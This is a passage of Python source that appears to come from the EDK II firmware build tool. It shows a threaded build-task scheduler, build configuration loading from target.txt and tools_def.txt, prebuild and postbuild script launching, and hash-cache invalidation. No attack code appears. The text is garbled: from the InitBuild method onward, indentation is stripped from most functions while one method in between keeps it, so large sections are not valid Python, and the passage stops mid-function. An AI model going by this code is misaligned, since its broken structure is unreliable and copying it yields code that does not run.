                        BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
                BuildTask._PendingQueueLock.release()
                # launch build thread until the maximum number of threads is reached
                while not BuildTask._ErrorFlag.isSet():
                    # empty ready queue, do nothing further
                    if len(BuildTask._ReadyQueue) == 0:
                        break
                    # wait for active thread(s) exit
                    BuildTask._Thread.acquire(True)
                    # start a new build thread
                    Bo, Bt = BuildTask._ReadyQueue.popitem()
                    # move into running queue
                    BuildTask._RunningQueueLock.acquire()
                    BuildTask._RunningQueue[Bo] = Bt
                    BuildTask._RunningQueueLock.release()
                    Bt.Start()
                    # avoid tense loop
                    time.sleep(0.01)
                # avoid tense loop
                time.sleep(0.01)
            # wait for all running threads exit
            if BuildTask._ErrorFlag.isSet():
                EdkLogger.quiet("\nWaiting for all build threads exit...")
            # while not BuildTask._ErrorFlag.isSet() and \
            while len(BuildTask._RunningQueue) > 0:
                EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
                EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
                # avoid tense loop
                time.sleep(0.1)
        except BaseException as X:
            #
            # TRICK: hide the output of threads left running, so that the user can
            # catch the error message easily
            #
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
        BuildTask._PendingQueue.clear()
        BuildTask._ReadyQueue.clear()
        BuildTask._RunningQueue.clear()
        BuildTask._TaskQueue.clear()
        BuildTask._SchedulerStopped.set()
    ## Wait for all running method exit
    #
    @staticmethod
    def WaitForComplete():
        BuildTask._SchedulerStopped.wait()
    ## Check if the scheduler is running or not
    #
    @staticmethod
    def IsOnGoing():
        return not BuildTask._SchedulerStopped.isSet()
    ## Abort the build
    @staticmethod
    def Abort():
        if BuildTask.IsOnGoing():
            BuildTask._ErrorFlag.set()
            BuildTask.WaitForComplete()
    ## Check if there's error in running thread
    #
    # Since the main thread cannot catch exceptions in other thread, we have to
    # use threading.Event to communicate this formation to main thread.
    #
    @staticmethod
    def HasError():
        return BuildTask._ErrorFlag.isSet()
    ## Get error message in running thread
    #
    # Since the main thread cannot catch exceptions in other thread, we have to
    # use a static variable to communicate this message to main thread.
    #
    @staticmethod
    def GetErrorMessage():
        return BuildTask._ErrorMessage
    ## Factory method to create a BuildTask object
    #
    # This method will check if a module is building or has been built. And if
    # true, just return the associated BuildTask object in the _TaskQueue. If
    # not, create and return a new BuildTask object. The new BuildTask object
    # will be appended to the _PendingQueue for scheduling later.
    #
    # @param BuildItem A BuildUnit object representing a build object
    # @param Dependency The dependent build object of BuildItem
    #
    @staticmethod
    def New(BuildItem, Dependency=None):
        if BuildItem in BuildTask._TaskQueue:
            Bt = BuildTask._TaskQueue[BuildItem]
            return Bt
        Bt = BuildTask()
        Bt._Init(BuildItem, Dependency)
        BuildTask._TaskQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.acquire()
        BuildTask._PendingQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.release()
        return Bt
    ## The real constructor of BuildTask
    #
    # @param BuildItem A BuildUnit object representing a build object
    # @param Dependency The dependent build object of BuildItem
    #
    def _Init(self, BuildItem, Dependency=None):
        self.BuildItem = BuildItem
        self.DependencyList = []
        if Dependency is None:
            Dependency = BuildItem.Dependency
        else:
            Dependency.extend(BuildItem.Dependency)
        self.AddDependency(Dependency)
        # flag indicating build completes, used to avoid unnecessary re-build
        self.CompleteFlag = False
    ## Check if all dependent build tasks are completed or not
    #
    def IsReady(self):
        ReadyFlag = True
        for Dep in self.DependencyList:
            if Dep.CompleteFlag == True:
                continue
            ReadyFlag = False
            break
        return ReadyFlag
    ## Add dependent build task
    #
    # @param Dependency The list of dependent build objects
    #
    def AddDependency(self, Dependency):
        for Dep in Dependency:
            if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyHash():
                self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
    ## The thread wrapper of LaunchCommand function
    #
    # @param Command A list or string contains the call of the command
    # @param WorkingDir The directory in which the program will be running
    #
    def _CommandThread(self, Command, WorkingDir):
        try:
            self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
            self.CompleteFlag = True
            # Run hash operation post dependency, to account for libs
            if GlobalData.gUseHashCache and self.BuildItem.BuildObject.IsLibrary:
                HashFile = path.join(self.BuildItem.BuildObject.BuildDir, self.BuildItem.BuildObject.Name + ".hash")
                SaveFileOnChange(HashFile, self.BuildItem.BuildObject.GenModuleHash(), True)
        except:
            #
            # TRICK: hide the output of threads left running, so that the user can
            # catch the error message easily
            #
            if not BuildTask._ErrorFlag.isSet():
                GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
                                                                  self.BuildItem.BuildObject.Arch,
                                                                  self.BuildItem.BuildObject.ToolChain,
                                                                  self.BuildItem.BuildObject.BuildTarget
                                                                 )
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
                                      (threading.currentThread().getName(), Command, WorkingDir)
        # Set the value used by hash invalidation flow in GlobalData.gModuleBuildTracking to 'SUCCESS'
        # If Module or Lib is being tracked, it did not fail header check test, and built successfully
        if (self.BuildItem.BuildObject.Arch in GlobalData.gModuleBuildTracking and
            self.BuildItem.BuildObject in GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch] and
            GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch][self.BuildItem.BuildObject] != 'FAIL_METAFILE' and
            not BuildTask._ErrorFlag.isSet()
            ):
            GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch][self.BuildItem.BuildObject] = 'SUCCESS'
        # indicate there's a thread is available for another build task
        BuildTask._RunningQueueLock.acquire()
        BuildTask._RunningQueue.pop(self.BuildItem)
        BuildTask._RunningQueueLock.release()
        BuildTask._Thread.release()
    ## Start build task thread
    #
    def Start(self):
        EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
        Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
        self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
        self.BuildTread.setName("build thread")
        self.BuildTread.setDaemon(False)
        self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
    ## Constructor
    #
    # Records the metadata of one EFI image and pads its size.
    #
    #   @param  BaseName    The full file path of image.
    #   @param  Guid        The GUID for image.
    #   @param  Arch        Arch of this image.
    #   @param  OutputDir   The output directory for image.
    #   @param  DebugDir    The debug directory for image.
    #   @param  ImageClass  PeImage Information
    #
    def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
        self.BaseName = BaseName
        self.Guid = Guid
        self.Arch = Arch
        self.OutputDir = OutputDir
        self.DebugDir = DebugDir
        self.Image = ImageClass
        # Round the image size up to the next 4 KB boundary.  Note this always
        # adds a page: a size that is already page-aligned still grows by
        # 0x1000, preserving the historical behaviour.
        PageSize = 0x1000
        self.Image.Size = (self.Image.Size // PageSize + 1) * PageSize
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
    def __init__(self, Target, WorkspaceDir, BuildOptions):
        """Capture build options, set up global state, and run pre-build steps.

        @param Target        The build command target, one of gSupportedTarget
        @param WorkspaceDir  The directory of workspace
        @param BuildOptions  Build options passed from command line
        """
        self.WorkspaceDir = WorkspaceDir
        self.Target = Target
        self.PlatformFile = BuildOptions.PlatformFile
        self.ModuleFile = BuildOptions.ModuleFile
        self.ArchList = BuildOptions.TargetArch
        self.ToolChainList = BuildOptions.ToolChain
        self.BuildTargetList= BuildOptions.BuildTarget
        self.Fdf = BuildOptions.FdfFile
        self.FdList = BuildOptions.RomImage
        self.FvList = BuildOptions.FvImage
        self.CapList = BuildOptions.CapName
        self.SilentMode = BuildOptions.SilentMode
        self.ThreadNumber = BuildOptions.ThreadNumber
        self.SkipAutoGen = BuildOptions.SkipAutoGen
        self.Reparse = BuildOptions.Reparse
        self.SkuId = BuildOptions.SkuId
        if self.SkuId:
            GlobalData.gSKUID_CMD = self.SkuId
        self.ConfDirectory = BuildOptions.ConfDirectory
        self.SpawnMode = True
        self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
        self.TargetTxt = TargetTxtClassObject()
        self.ToolDef = ToolDefClassObject()
        self.AutoGenTime = 0
        self.MakeTime = 0
        self.GenFdsTime = 0
        GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
        #Set global flag for build mode
        GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
        GlobalData.gUseHashCache = BuildOptions.UseHashCache
        GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
        GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
        GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
        GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
        # the binary cache options are only valid in combination with --hash
        if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
        if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
        if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
        # resolve relative cache paths against the (multiple) workspace
        if GlobalData.gBinCacheSource:
            BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
            if not os.path.isabs(BinCacheSource):
                BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
            GlobalData.gBinCacheSource = BinCacheSource
        else:
            if GlobalData.gBinCacheSource is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
        if GlobalData.gBinCacheDest:
            BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
            if not os.path.isabs(BinCacheDest):
                BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
            GlobalData.gBinCacheDest = BinCacheDest
        else:
            if GlobalData.gBinCacheDest is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
        if self.ConfDirectory:
            # Get alternate Conf location, if it is absolute, then just use the absolute directory name
            ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
            if not os.path.isabs(ConfDirectoryPath):
                # Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
                # This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
        else:
            if "CONF_PATH" in os.environ:
                ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
            else:
                # Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
        GlobalData.gConfDirectory = ConfDirectoryPath
        GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
        if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
            os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
        self.Db = WorkspaceDatabase()
        self.BuildDatabase = self.Db.BuildObject
        self.Platform = None
        self.ToolChainFamily = None
        self.LoadFixAddress = 0
        self.UniFlag = BuildOptions.Flag
        self.BuildModules = []
        self.HashSkipModules = []
        self.Db_Flag = False
        self.LaunchPrebuildFlag = False
        self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
        if BuildOptions.CommandLength:
            GlobalData.gCommandMaxLength = BuildOptions.CommandLength
        # print dot character during doing some time-consuming work
        self.Progress = Utils.Progressor()
        # print current build environment and configuration
        EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
        if "PACKAGES_PATH" in os.environ:
            # WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
        EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
        if "EDK_TOOLS_BIN" in os.environ:
            # Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
        EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
        if "PYTHON3_ENABLE" in os.environ:
            PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
            if PYTHON3_ENABLE != "TRUE":
                PYTHON3_ENABLE = "FALSE"
            EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
        if "PYTHON_COMMAND" in os.environ:
            EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
        self.InitPreBuild()
        self.InitPostBuild()
        if self.Prebuild:
            EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
        if self.Postbuild:
            EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
        if self.Prebuild:
            self.LaunchPrebuild()
            # NOTE(review): TargetTxt/ToolDef are re-created after the
            # prebuild step, presumably because that step may rewrite
            # target.txt / tools_def.txt -- confirm before refactoring
            self.TargetTxt = TargetTxtClassObject()
            self.ToolDef = ToolDefClassObject()
        if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
            self.InitBuild()
        EdkLogger.info("")
        os.chdir(self.WorkspaceDir)
    ## Load configuration
    #
    # This method will parse target.txt and get the build configurations.
    #
    def LoadConfiguration(self):
        """Parse Conf/target.txt and tools_def.txt and derive the final build
        configuration: architecture list, build targets, tool chain tags,
        tool chain families, thread count and the active platform file.

        Command-line options always win; target.txt only fills in values that
        were not given on the command line.  Aborts the build (via
        EdkLogger.error, which raises) when a required configuration file or a
        usable tool chain cannot be found.
        """
        #
        # Check target.txt and tools_def.txt and Init them
        #
        BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
        if os.path.isfile(BuildConfigurationFile) == True:
            StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)

            # tools_def.txt location comes from target.txt; fall back to the
            # default name under Conf/ when target.txt does not set it.
            ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
            if ToolDefinitionFile == '':
                ToolDefinitionFile = gToolsDefinition
                ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
            if os.path.isfile(ToolDefinitionFile) == True:
                StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
            else:
                EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
        else:
            EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)

        # if no ARCH given in command line, get it from target.txt
        if not self.ArchList:
            self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
        self.ArchList = tuple(self.ArchList)

        # if no build target given in command line, get it from target.txt
        if not self.BuildTargetList:
            self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]

        # if no tool chain given in command line, get it from target.txt
        if not self.ToolChainList:
            self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
            if self.ToolChainList is None or len(self.ToolChainList) == 0:
                EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")

        # check if the tool chains are defined or not
        NewToolChainList = []
        for ToolChain in self.ToolChainList:
            if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
            else:
                NewToolChainList.append(ToolChain)
        # if no tool chain available, break the build
        if len(NewToolChainList) == 0:
            EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                            ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
        else:
            self.ToolChainList = NewToolChainList

        # Map every tool chain tag to its FAMILY (MSFT/GCC/...); a missing
        # family silently defaults to MSFT with a warning.
        ToolChainFamily = []
        ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
        for Tool in self.ToolChainList:
            if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
               or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
                EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
                ToolChainFamily.append(TAB_COMPILER_MSFT)
            else:
                ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
        self.ToolChainFamily = ToolChainFamily

        # Thread count: command line, else target.txt, else 0 meaning
        # "auto-detect" via cpu_count() below (1 when detection fails).
        if self.ThreadNumber is None:
            self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
            if self.ThreadNumber == '':
                self.ThreadNumber = 0
            else:
                self.ThreadNumber = int(self.ThreadNumber, 0)

        if self.ThreadNumber == 0:
            try:
                self.ThreadNumber = multiprocessing.cpu_count()
            except (ImportError, NotImplementedError):
                self.ThreadNumber = 1

        if not self.PlatformFile:
            PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
            if not PlatformFile:
                # Try to find one in current directory
                WorkingDirectory = os.getcwd()
                FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
                FileNum = len(FileList)
                if FileNum >= 2:
                    EdkLogger.error("build", OPTION_MISSING,
                                    ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
                elif FileNum == 1:
                    PlatformFile = FileList[0]
                else:
                    EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                                    ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")

            self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
    def InitPreBuild(self):
        """Resolve the PREBUILD script command line.

        Loads the build configuration, publishes TARGET/ARCH/TOOLCHAIN/FAMILY
        into GlobalData.gGlobalDefines, then takes the prebuild command from
        the PREBUILD command-line define or, failing that, from the platform
        DSC.  Workspace-relative file arguments are expanded to absolute
        paths and the effective build options are appended so the script sees
        the same configuration as the main build.
        """
        self.LoadConfiguration()
        ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
        if ErrorCode != 0:
            EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        # Publish the first of each resolved list as a global define so the
        # DSC parse below sees the same context as the main build.
        if self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
        if self.ArchList:
            GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
        if self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
        if self.ToolChainFamily:
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
        # Command-line PREBUILD define wins over the DSC's PREBUILD setting;
        # Db_Flag records that the workspace database was consulted.
        if 'PREBUILD' in GlobalData.gCommandLineDefines:
            self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
        else:
            self.Db_Flag = True
            Platform = self.Db.MapPlatform(str(self.PlatformFile))
            self.Prebuild = str(Platform.Prebuild)
        if self.Prebuild:
            PrebuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths. Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Prebuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PrebuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PrebuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PrebuildList.append(Arg)
            self.Prebuild = ' '.join(PrebuildList)
            self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Error handling for hash feature
#
# On BuildTask error, iterate through the Module Build tracking
# dictionary to determine wheather a module failed to build. Invalidate
# the hash associated with that module by removing it from storage.
#
#
def invalidateHash(self):
# Only for hashing feature
if not GlobalData.gUseHashCache:
return
# GlobalData.gModuleBuildTracking contains only modules or libs that cannot be skipped by hash
for moduleAutoGenObjArch in GlobalData.gModuleBuildTracking.keys():
for moduleAutoGenObj in GlobalData.gModuleBuildTracking[moduleAutoGenObjArch].keys():
# Skip invalidating for Successful Module/Lib builds
if GlobalData.gModuleBuildTracking[moduleAutoGenObjArch][moduleAutoGenObj] == 'SUCCESS':
continue
# The module failed to build, failed to start building, or failed the header check test from this point on
# Remove .hash from build
ModuleHashFile = os.path.join(moduleAutoGenObj.BuildDir, moduleAutoGenObj.Name + ".hash")
if os.path.exists(ModuleHashFile):
os.remove(ModuleHashFile)
# Remove .hash file from cache
if GlobalData.gBinCacheDest:
FileDir = os.path.join(GlobalData.gBinCacheDest, moduleAutoGenObj.Arch, moduleAutoGenObj.SourceDir, moduleAutoGenObj.MetaFile.BaseName)
HashFile = os.path.join(FileDir, moduleAutoGenObj.Name + '.hash')
if os.path.exists(HashFile):
os.remove(HashFile)
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
